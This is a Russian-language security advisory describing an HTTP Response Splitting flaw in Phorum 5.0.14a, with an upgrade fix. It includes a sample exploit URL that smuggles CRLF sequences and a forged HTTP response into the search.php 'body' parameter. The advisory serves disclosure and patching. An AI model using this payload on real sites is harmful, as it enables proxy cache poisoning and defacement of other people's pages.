Атака HTTP Response Splitting в Phorum

Дата публикации:
23.03.2005
Дата изменения:
27.03.2006
Всего просмотров:
1658
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Phorum 5.0.14a

Описание:
Уязвимость позволяет удаленному пользователю отравить кеш прокси сервера и изменить содержимое web страниц уязвимого сайта.

Уязвимость существует из-за недостаточной обработки параметра Location. Удаленный пользователь может с помощью специально сформированного HTTP GET запроса произвести HTTP Response Splitting атаку и подменить содержимое страниц сайта в кеше прокси сервера.

Пример/Эксплоит:

http://[server]/phorum5/search.php?forum_id=0&search=1
&body=%0d%0aContent-Length:%200%0d%0a%0d%0a
HTTP/1.0%20200%20OK%0d%0aContent-Type:%20
text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a
<html>Scanned by PTsecurity</html>%0d%0a&author=1&
subject=1&match_forum=ALL&match_type=ALL&match_dates=30

URL производителя: www.phorum.org

Решение: Установите последнюю версию от производителя.
phorum.org/downloads/phorum-5.0.15a.tar.gz



Ссылки: Phorum "location" HTTP Response Splitting Vulnerability
или введите имя

CAPTCHA